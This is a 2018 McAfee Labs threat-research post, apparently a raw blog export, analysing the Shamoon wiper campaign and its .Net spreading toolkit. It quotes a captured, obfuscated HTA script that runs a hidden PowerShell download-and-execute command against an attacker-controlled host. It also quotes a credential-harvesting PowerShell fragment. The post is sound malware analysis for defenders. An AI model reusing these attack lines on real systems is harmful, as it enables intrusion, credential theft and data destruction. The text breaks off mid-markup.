{"id":93278,"date":"2018-12-19T13:45:13","date_gmt":"2018-12-19T21:45:13","guid":{"rendered":"https:\/\/securingtomorrow.mcafee.com\/?p=93278"},"modified":"2024-02-19T22:05:55","modified_gmt":"2024-02-20T06:05:55","slug":"shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/","title":{"rendered":"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems"},"content":{"rendered":"<p>Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks that struck several companies in the Middle East and Europe. In that <a href=\"https:\/\/securingtomorrow.mcafee.com\/other-blogs\/mcafee-labs\/shamoon-returns-to-wipe-systems-in-middle-east-europe\/\">analysis<\/a> we discussed one difference to previous Shamoon campaigns. The latest version has a modular approach that allows the wiper to be used as a standalone threat.<\/p>\n<p>After further analysis of the three versions of Shamoon and based on the evidence we describe here, we conclude that the Iranian hacker group APT33\u2014or a group masquerading as APT33\u2014is likely responsible for these attacks.<\/p>\n<p>In the Shamoon attacks of 2016\u20132017, the adversaries used both the Shamoon Version 2 wiper and the wiper Stonedrill. In the 2018 attacks, we find the Shamoon Version 3 wiper as well as the wiper Filerase, first mentioned by <a href=\"https:\/\/www.symantec.com\/blogs\/threat-intelligence\/shamoon-destructive-threat-re-emerges-new-sting-its-tail\">Symantec<\/a>.<\/p>\n<p>These new wiper samples (Filerase) differ from the Shamoon Version 3, which we analyzed last week. The latest Shamoon appears to be part of a toolkit with several modules. 
We identified the following modules:<\/p>\n<ul>\n<li><strong>OCLC.exe:<\/strong> Used to read a list of targeted computers created by the attackers. This tool is responsible for running the second tool, spreader.exe, with the list of targeted machines.<\/li>\n<li><strong>Spreader.exe:<\/strong> Used to spread the file eraser to each machine specified in that list. It also gets information about the OS version.<\/li>\n<li><strong>SpreaderPsexec.exe:<\/strong> Similar to spreader.exe but uses psexec.exe to remotely execute the wiper.<\/li>\n<li><strong>SlHost.exe:<\/strong> The new wiper, which browses the targeted system and deletes every file.<\/li>\n<\/ul>\n<p>The attackers have essentially packaged an old version (V2) of Shamoon with an unsophisticated toolkit coded in .Net. This suggests that multiple developers have been involved in preparing the malware for this latest wave of attacks. In our last post, we observed that Shamoon is a modular wiper that can be used by other groups. With these recent attacks, this supposition seems to be confirmed. We have learned that the adversaries prepared months in advance for this attack, with the wiper execution as the goal.<\/p>\n<p>This post provides additional insight about the attack and a detailed analysis of the .Net tool kit.<\/p>\n<h2>Geopolitical context<\/h2>\n<p>The motivation behind the attack is still unclear. Shamoon Version 1 attacked just two targets in the Middle East. Shamoon Version 2 attacked multiple targets in Saudi Arabia. 
Version 3 went after companies in the Middle East by using their suppliers in Europe, in a supply chain attack.<\/p>\n<p>Inside the .Net wiper, we discovered the following ASCII art:<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-93281 size-large\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-1-1024x563.png\" alt=\"\" width=\"1024\" height=\"563\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-1-1024x563.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-1-300x165.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-1-768x422.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-1-910x500.png 910w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-1.png 1247w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><\/p>\n<p>These characters resemble the Arabic text \u062a\u064e\u0628\u0651\u064e\u062a\u0652 \u064a\u064e\u062f\u064e\u0627 \u0623\u064e\u0628\u0650\u064a \u0644\u064e\u0647\u064e\u0628\u064d \u0648\u064e\u062a\u064e\u0628\u0651\u064e. 
This is a phrase from the Quran (Surah Masad, Ayat 1 [111:1]) that means \u201cperish the hands of the Father of flame\u201d or \u201cthe power of Abu Lahab will perish, and he will perish.\u201d What does this mean in the context of a cyber campaign targeting energy industries in the Middle East?<\/p>\n<h2>Overview of the attack<\/h2>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-93282 size-large\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-2-796x1024.png\" alt=\"\" width=\"796\" height=\"1024\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-2-796x1024.png 796w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-2-233x300.png 233w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-2-768x987.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-2-389x500.png 389w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-2.png 1127w\" sizes=\"auto, (max-width: 796px) 100vw, 796px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-3-1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93311\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-3-1.png\" alt=\"\" width=\"753\" height=\"216\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-3-1.png 753w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-3-1-300x86.png 300w\" sizes=\"auto, (max-width: 753px) 100vw, 753px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<h2>How did the malware get onto the victim\u2019s network?<\/h2>\n<p>We received intelligence that the adversaries had 
created websites closely resembling legitimate domains which carry job offerings. For example:<\/p>\n<ul>\n<li>Hxxp:\/\/possibletarget.ddns.com:880\/JobOffering.<\/li>\n<\/ul>\n<p>Many of the URLs we discovered were related to the energy sector operating mostly in the Middle East. Some of these sites contained malicious HTML application files that execute other payloads. Other sites lured victims to login using their corporate credentials. This preliminary attack seems to have started by the end of August 2018, according to our telemetry, to gather these credentials.<\/p>\n<p>A code example from one malicious HTML application file:<\/p>\n<p style=\"padding-left: 30px;\"><em>YjDrMeQhBOsJZ = &#8220;WS&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>wcpRKUHoZNcZpzPzhnJw = &#8220;crip&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>RulsTzxTrzYD = &#8220;t.Sh&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>MPETWYrrRvxsCx = &#8220;ell&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx)<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>OoOVRmsXUQhNqZJTPOlkymqzsA=new ActiveXObject(PCaETQQJwQXVJ)<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>ULRXZmHsCORQNoLHPxW = &#8220;cm&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>zhKokjoiBdFhTLiGUQD = &#8220;d.e&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>KoORGlpnUicmMHtWdpkRwmXeQN = &#8220;xe&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>KoORGlpnUicmMHtWdp = &#8220;.&#8221;<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>KoORGlicmMHtWdp = &#8220;(&#8216;http:\/\/mynetwork.ddns.net:880\/*****.ps1&#8217;)<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>OoOVRmsXUQhNqZJTPOlkymqzsA.run(&#8216;%windir%\\\\System32\\\\&#8217; + FKeRGlzVvDMH + &#8216; \/c powershell -w 1 IEX (New-Object Net.WebClient)&#8217;+KoORGlpnUicmMHtWdp+&#8217;downloadstring&#8217;+KoORGlicmMHtWdp)<\/em><\/p>\n<p 
style=\"padding-left: 30px;\"><em>OoOVRmsXUQhNqZJTPOlkymqzsA.run(&#8216;%windir%\\\\System32\\\\&#8217; + FKeRGlzVvDMH + &#8216; \/c powershell -window hidden -enc<\/em><\/p>\n<p>The preceding script opens a command shell on the victim\u2019s machine and downloads a PowerShell script from an external location. From another location, it loads a second file to execute.<\/p>\n<p>We discovered one of the PowerShell scripts. Part of the code shows they were harvesting usernames, passwords, and domains:<\/p>\n<p style=\"padding-left: 30px;\"><em>function primer {<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>if ($env:username -eq &#8220;$($env:computername)$&#8221;){$u=&#8221;NT AUTHORITY\\SYSTEM&#8221;}else{$u=$env:username}<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>$o=&#8221;$env:userdomain\\$u<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>$env:computername<\/em><\/p>\n<p style=\"padding-left: 30px;\"><em>$env:PROCESSOR_ARCHITECTURE<\/em><\/p>\n<p>With legitimate credentials to a network it is easy to login and spread the wipers.<\/p>\n<h2>.Net tool kit<\/h2>\n<p>The new wave of Shamoon is accompanied by a .Net tool kit that spreads Shamoon Version 3 and the wiper Filerase.<\/p>\n<h3><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-4.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93284\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-4.png\" alt=\"\" width=\"988\" height=\"368\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-4.png 988w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-4-300x112.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-4-768x286.png 768w\" sizes=\"auto, (max-width: 988px) 100vw, 988px\" \/><\/a><\/h3>\n<p>This first component (OCLC.exe) reads two text files stored in two local directories. 
Directories \u201cshutter\u201d and \u201clight\u201d contain a list of targeted machines.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-5.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93285\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-5.png\" alt=\"\" width=\"596\" height=\"403\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-5.png 596w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-5-300x203.png 300w\" sizes=\"auto, (max-width: 596px) 100vw, 596px\" \/><\/a><\/p>\n<p>OCLC.exe starts a new hidden command window process to run the second component, spreader.exe, which spreads the Shamoon variant and Filerase with the concatenated text file as parameter.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-6.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93286\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-6.png\" alt=\"\" width=\"694\" height=\"172\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-6.png 694w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-6-300x74.png 300w\" sizes=\"auto, (max-width: 694px) 100vw, 694px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-7.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93287\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-7.png\" alt=\"\" width=\"988\" height=\"335\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-7.png 988w, 
https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-7-300x102.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-7-768x260.png 768w\" sizes=\"auto, (max-width: 988px) 100vw, 988px\" \/><\/a><\/p>\n<p>The spreader component takes as a parameter the text file that contains the list of targeted machines and the Windows version. It first checks the Windows version of the targeted computers.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-8.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93288\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-8.png\" alt=\"\" width=\"809\" height=\"165\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-8.png 809w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-8-300x61.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-8-768x157.png 768w\" sizes=\"auto, (max-width: 809px) 100vw, 809px\" \/><\/a><\/p>\n<p>The spreader places the executable files (Shamoon and Filerase) into the folder Net2.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-9.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93289\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-9.png\" alt=\"\" width=\"628\" height=\"191\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-9.png 628w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-9-300x91.png 300w\" sizes=\"auto, (max-width: 628px) 100vw, 628px\" \/><\/a><\/p>\n<p>It creates a folder on remote computers: C:\\\\Windows\\System32\\Program Files\\Internet Explorer\\Signing.<\/p>\n<p><a 
href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-10.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93290\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-10.png\" alt=\"\" width=\"785\" height=\"186\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-10.png 785w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-10-300x71.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-10-768x182.png 768w\" sizes=\"auto, (max-width: 785px) 100vw, 785px\" \/><\/a><\/p>\n<p>The spreader copies the executables into that directory.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-11.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93291\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-11.png\" alt=\"\" width=\"887\" height=\"120\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-11.png 887w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-11-300x41.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-11-768x104.png 768w\" sizes=\"auto, (max-width: 887px) 100vw, 887px\" \/><\/a><\/p>\n<p>It runs the executables on the remote machine by creating a batch file in the administrative share \\\\RemoteMachine\\admin$\\\\process.bat. This file contains the path of the executables. The spreader then sets up the privileges to run the batch file.<\/p>\n<p>If anything fails, the malware creates the text file NotFound.txt, which contains the name of the machine and the OS version. 
This can be used by the attackers to track any issues in the spreading process.<\/p>\n<p>The following screenshot shows the \u201cexecute\u201d function:<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-12.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93292\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-12.png\" alt=\"\" width=\"868\" height=\"356\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-12.png 868w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-12-300x123.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-12-768x315.png 768w\" sizes=\"auto, (max-width: 868px) 100vw, 868px\" \/><\/a><\/p>\n<p>If the executable files are not present in the folder Net2, it checks the folders \u201call\u201d and Net4.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-13.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93293\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-13.png\" alt=\"\" width=\"811\" height=\"422\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-13.png 811w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-13-300x156.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-13-768x400.png 768w\" sizes=\"auto, (max-width: 811px) 100vw, 811px\" \/><\/a><\/p>\n<p>To spread the wipers, the attackers included an additional spreader using Psexec.exe, an administration tool used to remotely execute commands.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-14.png\"><img loading=\"lazy\" decoding=\"async\" 
class=\"alignnone size-full wp-image-93294\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-14.png\" alt=\"\" width=\"988\" height=\"303\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-14.png 988w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-14-300x92.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-14-768x236.png 768w\" sizes=\"auto, (max-width: 988px) 100vw, 988px\" \/><\/a><\/p>\n<p>The only difference is that this spreader uses psexec, which is supposed to be stored in Net2 on the spreading machine. It could be used on additional machines to move the malware further.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-15.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93295\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-15.png\" alt=\"\" width=\"779\" height=\"67\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-15.png 779w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-15-300x26.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-15-768x66.png 768w\" sizes=\"auto, (max-width: 779px) 100vw, 779px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-16.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93296\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-16.png\" alt=\"\" width=\"988\" height=\"335\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-16.png 988w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-16-300x102.png 300w, 
https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-16-768x260.png 768w\" sizes=\"auto, (max-width: 988px) 100vw, 988px\" \/><\/a><\/p>\n<p>The wiper contains three options:<\/p>\n<ul>\n<li>SilentMode: Runs the wiper without any output.<\/li>\n<li>BypassAcl: Escalates privileges. It is always enabled.<\/li>\n<li>PrintStackTrace: Tracks the number of folders and files erased.<\/li>\n<\/ul>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-17.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93297\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-17.png\" alt=\"\" width=\"562\" height=\"402\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-17.png 562w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-17-300x215.png 300w\" sizes=\"auto, (max-width: 562px) 100vw, 562px\" \/><\/a><\/p>\n<p>The BypassAcl option is always \u201ctrue\u201d even if the option is not specified. 
It enables <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/desktop\/secauthz\/privilege-constants\">the following privileges<\/a>:<\/p>\n<ul>\n<li>SeBackupPrivilege<\/li>\n<li>SeRestorePrivilege<\/li>\n<li>SeTakeOwnershipPrivilege<\/li>\n<li>SeSecurityPrivilege<\/li>\n<\/ul>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-18.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93298\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-18.png\" alt=\"\" width=\"347\" height=\"123\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-18.png 347w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-18-300x106.png 300w\" sizes=\"auto, (max-width: 347px) 100vw, 347px\" \/><\/a><\/p>\n<p>To find a file to erase, the malware uses function GetFullPath to get all paths.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-19.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93299\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-19.png\" alt=\"\" width=\"829\" height=\"153\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-19.png 829w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-19-300x55.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-19-768x142.png 768w\" sizes=\"auto, (max-width: 829px) 100vw, 829px\" \/><\/a><\/p>\n<p>It erases each folder and file.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-20.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93300\" 
src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-20.png\" alt=\"\" width=\"665\" height=\"72\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-20.png 665w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-20-300x32.png 300w\" sizes=\"auto, (max-width: 665px) 100vw, 665px\" \/><\/a><\/p>\n<p>The malware browses every file in every folder on the system.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-21.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93301\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-21.png\" alt=\"\" width=\"1010\" height=\"231\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-21.png 1010w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-21-300x69.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-21-768x176.png 768w\" sizes=\"auto, (max-width: 1010px) 100vw, 1010px\" \/><\/a><\/p>\n<p>To erase all files and folders, it first removes the \u201cread only\u201d attribute so that it can overwrite them.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-22.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93302\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-22.png\" alt=\"\" width=\"610\" height=\"107\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-22.png 610w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-22-300x53.png 300w\" sizes=\"auto, (max-width: 610px) 100vw, 610px\" \/><\/a><\/p>\n<p>It changes the creation, write, and access date and time to 01\/01\/3000 at 12:01:01 for 
each file.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-23.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93303\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-23.png\" alt=\"\" width=\"471\" height=\"197\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-23.png 471w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-23-300x125.png 300w\" sizes=\"auto, (max-width: 471px) 100vw, 471px\" \/><\/a><\/p>\n<p>The malware rewrites each file two times with random strings.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-24.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93304\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-24.png\" alt=\"\" width=\"461\" height=\"527\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-24.png 461w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-24-262x300.png 262w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-24-437x500.png 437w\" sizes=\"auto, (max-width: 461px) 100vw, 461px\" \/><\/a><\/p>\n<p>It starts to delete the files using the API CreateFile with the ACCESS_MASK DELETE flag.<\/p>\n<p>Then it uses FILE_DISPOSITION_INFORMATION to delete the files.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-25.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-93305\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-25.png\" alt=\"\" width=\"670\" height=\"146\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-25.png 
